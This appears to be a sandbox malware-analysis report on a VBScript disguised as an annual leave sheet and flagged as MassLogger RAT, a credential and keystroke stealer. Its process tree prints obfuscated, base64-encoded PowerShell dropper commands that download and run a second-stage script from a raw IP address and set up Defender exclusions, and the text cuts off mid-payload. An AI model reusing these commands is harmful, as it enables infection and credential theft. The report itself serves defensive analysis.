Windows
Analysis Report
Annual Leave sheet 2025.vbs
Overview
General Information
Detection
MassLogger RAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Register Wscript In Run Key
VBScript performs obfuscated calls to suspicious functions
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: DeviceCredentialDeployment Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5364 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Annua l Leave sh eet 2025.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) cmd.exe (PID: 5064 cmdline:
"C:\Window s\system32 \cmd.exe" "/C poWeRS HELL.eXe -EX uNrEs TRICtEd -nOp -w 1 -c DEvIcECRE DentiaLdEp lOyMEnT ; InvOke-e XpRESsIOn( $(invOke-E XpResSioN( '[sYstEm.t exT.ENcOdi Ng]'+[ChaR ]0x3A+[cHa r]0x3a+'Ut f8.gEtSTrI NG([systEm .convERt]' +[CHAR]0x3 A+[cHar]0X 3a+'fRomBA se64strINg ('+[ChAr]3 4+'DQogICA gICAgICRXZ EFSayA9IEF EZC10eVBlI C1NZW1CZVJ kRUZJbklUS U9uICdbRGx sSW1wb3J0K CJ1UkxNb04 iLCBDaGFyU 2V0ID0gQ2h hclNldC5Vb mljb2RlKV1 wdWJsaWMgc 3RhdGljIGV 4dGVybiBJb nRQdHIgVVJ MRG93bmxvY WRUb0ZpbGU oSW50UHRyI HpXLCBzdHJ pbmcgSHl0b FlaR3dPRlQ sIHN0cmluZ yB0c3RmeVU sIHVpbnQgb 2xhbEJOTmZ MU0ssIElud FB0ciBUaUx pKTsnIC1uQ W1lICJwdWx oY0d2aUFQI iAtTkFNRXN wYUNlIFBhc 1FJd3BEWSA tUGFzc1Roc nU7IA0KICA gICAgICAkV 2RBUms6OlV STERvd25sb 2FkVG9GaWx lKDAsImh0d HA6Ly80NS4 yMDAuMTQ5L jEwNDo1MDA wL2Rvd25sb 2FkL25vdmF fa2F5Y2VlL nZicyIsIiR lTlY6QVBQR EFUQVx3aW5 kb3dzdXBkY XRlLnZiUyI sMCwwKTsgD QogICAgICA gIHNUQXJUL XNMZUVwKDM pOyANCiAgI CAgICAgaW5 Wb0tlLWVYc HJFc1NpT24 gIiRFTnY6Q VBQREFUQVx 3aW5kb3dzd XBkYXRlLnZ iUyINCiAgI CAgICAg'+[ cHAr]0X22+ '))')))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6756 cmdline:
poWeRSHELL .eXe -EX uNrEsTRI CtEd -nOp -w 1 - c DE vIcECREDen tiaLdEplOy MEnT ; I nvOke-eXpR ESsIOn($(i nvOke-EXpR esSioN('[s YstEm.texT .ENcOdiNg] '+[ChaR]0x 3A+[cHar]0 x3a+'Utf8. gEtSTrING( [systEm.co nvERt]'+[C HAR]0x3A+[ cHar]0X3a+ 'fRomBAse6 4strINg('+ [ChAr]34+' DQogICAgIC AgICRXZEFS ayA9IEFEZC 10eVBlIC1N ZW1CZVJkRU ZJbklUSU9u ICdbRGxsSW 1wb3J0KCJ1 UkxNb04iLC BDaGFyU2V0 ID0gQ2hhcl NldC5Vbmlj b2RlKV1wdW JsaWMgc3Rh dGljIGV4dG VybiBJbnRQ dHIgVVJMRG 93bmxvYWRU b0ZpbGUoSW 50UHRyIHpX LCBzdHJpbm cgSHl0bFla R3dPRlQsIH N0cmluZyB0 c3RmeVUsIH VpbnQgb2xh bEJOTmZMU0 ssIEludFB0 ciBUaUxpKT snIC1uQW1l ICJwdWxoY0 d2aUFQIiAt TkFNRXNwYU NlIFBhc1FJ d3BEWSAtUG Fzc1RocnU7 IA0KICAgIC AgICAkV2RB Ums6OlVSTE Rvd25sb2Fk VG9GaWxlKD AsImh0dHA6 Ly80NS4yMD AuMTQ5LjEw NDo1MDAwL2 Rvd25sb2Fk L25vdmFfa2 F5Y2VlLnZi cyIsIiRlTl Y6QVBQREFU QVx3aW5kb3 dzdXBkYXRl LnZiUyIsMC wwKTsgDQog ICAgICAgIH NUQXJULXNM ZUVwKDMpOy ANCiAgICAg ICAgaW5Wb0 tlLWVYcHJF c1NpT24gIi RFTnY6QVBQ REFUQVx3aW 5kb3dzdXBk YXRlLnZiUy INCiAgICAg ICAg'+[cHA r]0X22+')) ')))" MD5: 04029E121A0CFA5991749937DD22A1D9) DeviceCredentialDeployment.exe (PID: 5852 cmdline:
"C:\Window s\system32 \DeviceCre dentialDep loyment.ex e" MD5: DF7FB30936DB15DCB57B2C75BF9EE719) csc.exe (PID: 1632 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\ilcg05 nv.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) cvtres.exe (PID: 5292 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES509F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 8F7BB283C9 9B46799FCD CA9D84A75A 0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) wscript.exe (PID: 1816 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\windo wsupdate.v bS" MD5: A47CBE969EA935BDD3AB568BB126BC80) cmd.exe (PID: 4524 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\c.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5432 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\AppD ata\Local\ Temp\c.bat " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1276 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('SUVYKFt UZXh0LkVuY 29kaW5nXTo 6VVRGOC5HZ XRTdHJpbmc oW0NvbnZlc nRdOjooJ2d uaXJ0UzQ2Z XNhQm1vckY nWy0xLi4tM TZdIC1qb2l uICcnKSgnQ 21aMWJtTjB hVzl1SUVGa 1pDMVhhVzV rYjNkelJHV m1aVzVrWlh KRmVHTnNkW E5wYjI0Z2V 3b2dJQ0FnY 0dGeVlXMG9 DaUFnSUNBZ 0lDQWdXM04 wY21sdVoxM GtjR0YwYUF vZ0lDQWdLU W9LQ2lBZ0l DQWtaWGhwY zNScGJtZEZ lR05zZFhOc GIyNXpJRDB nUjJWMExVM XdVSEpsWm1 WeVpXNWpaU 0I4SUZObGJ HVmpkQzFQW W1wbFkzUWd MVVY0Y0dGd VpGQnliM0J sY25SNUlFV jRZMngxYzJ sdmJsQmhkR 2dLSUNBZ0l HbG1JQ2drW lhocGMzUnB ibWRGZUdOc 2RYTnBiMjV 6SUMxdWIzU mpiMjUwWVd sdWN5QWtjR 0YwYUNrZ2V 3b2dJQ0FnS UNBZ0lDTWd RV1JwWTJsd mJtRWdieUJ rYVhKbGRNT 3pjbWx2SU1 PZ2N5QmxlR 05zZFhQRHR XVnpDaUFnS UNBZ0lDQWd RV1JrTFUxd 1VISmxabVZ 5Wlc1alpTQ XRSWGhqYkh WemFXOXVVR 0YwYUNBa2N HRjBhQW9nS UNBZ0lDQWd JRmR5YVhSb ExVaHZjM1F nSWtWNFkye DFjOE9qYnl CaFpHbGphV zl1WVdSaE9 pQWtjR0YwY UNJS0lDQWd JSDBnWld4e lpTQjdDaUF nSUNBZ0lDQ WdWM0pwZEd VdFNHOXpkQ 0FpVHlCa2F YSmxkTU96Y 21sdklDUnd ZWFJvSUdyR G9TQmxjM1R Eb1NCdVlYT WdaWGhqYkh Wenc3Vmxje TRpQ2lBZ0l DQjlDbjBLQ 2dwQlpHUXR WMmx1Wkc5M 2MwUmxabVZ 1WkdWeVJYa GpiSFZ6YVc 5dUlDMXdZW FJvSUNKRE9 sd2lDZ29LS khKbFoxQmh kR2dnUFNBa VNFdE1UVHB jVTA5R1ZGZ EJVa1ZjVFd samNtOXpiM lowWEZkcGJ tUnZkM05jU TNWeWNtVnV kRlpsY25Oc GIyNWNVRzl zYVdOcFpYT mNVM2x6ZEd WdElnb2tjb VZuVG1GdFp TQTlJQ0pEY jI1elpXNTB VSEp2YlhCM FFtVm9ZWFp wYjNKQlpHM XBiaUlLSkh KbFoxWmhiS FZsSUQwZ01 Bb0tDbWxtS UNndGJtOTB JQ2hVWlhOM ExWQmhkR2d nSkhKbFoxQ mhkR2dwS1N CN0NpQWdJQ 0JPWlhjdFN YUmxiU0F0V UdGMGFDQWt jbVZuVUdGM GFDQXRSbTl 5WTJVS2ZRb 0tDbE5sZEM xSmRHVnRVS Ep2Y0dWeWR Ia2dMVkJoZ EdnZ0pISmx aMUJoZEdnZ 0xVNWhiV1V nSkhKbFowN WhiV1VnTFZ aaGJIVmxJQ 1J5WldkV1l XeDFaUW9LV jNKcGRHVXR TRzl6ZENBa VZVRkRJRU5 2Ym5SeWIyd 2dVRzl3VlZ BZ1FubHdZW E56WldRdUl ncFhjbWwwW lMxSWIzTjB JQ0pET2lCQ lpHUmxaQzR pQ2c9PScpK Sk7aWV4ICh bVGV4dC5Fb mNvZGluZ10 6OlVURjguR 2V0U3RyaW5 nKFtDb252Z XJ0XTo6KCd nbmlydFM0N mVzYUJtb3J GJ1stMS4uL TE2XSAtam9 pbiAnJykoJ 2FXVjRJQ2h KYm5admEyV XRWMlZpVW1 WeGRXVnpkQ 0F0VlhKcEl DSm9kSFJ3Y 3pvdkx6QjR NQzV6ZEM4N ExUVlRMbkJ 6TVNJcCcpK Sk7ZW1wdHl zZXJ2aWNlc yAtZXR3O1N 0YXJ0LVNsZ WVwIC1TZWN vbmRzIDU7Z nVuY3Rpb24 geWxjZnhmZ XRkd2pzZGl yKCRwYXJhb V92YXIpewk kYWVzX3Zhc j1bU3lzdGV tLlNlY3Vya XR5LkNyeXB 0b2dyYXBoe S5BZXNdOjp DcmVhdGUoK TsJJGFlc19 2YXIuTW9kZ T1bU3lzdGV tLlNlY3Vya XR5LkNyeXB 0b2dyYXBoe S5DaXBoZXJ Nb2RlXTo6Q 0JDOwkkYWV zX3Zhci5QY WRkaW5nPVt TeXN0ZW0uU 2VjdXJpdHk uQ3J5cHRvZ 3JhcGh5LlB hZGRpbmdNb 2RlXTo6UEt DUzc7CSRhZ XNfdmFyLkt leT1bU3lzd GVtLkNvbnZ lcnRdOjooJ 2duaXJ0UzQ 2ZXNhQm1vc kYnWy0xLi4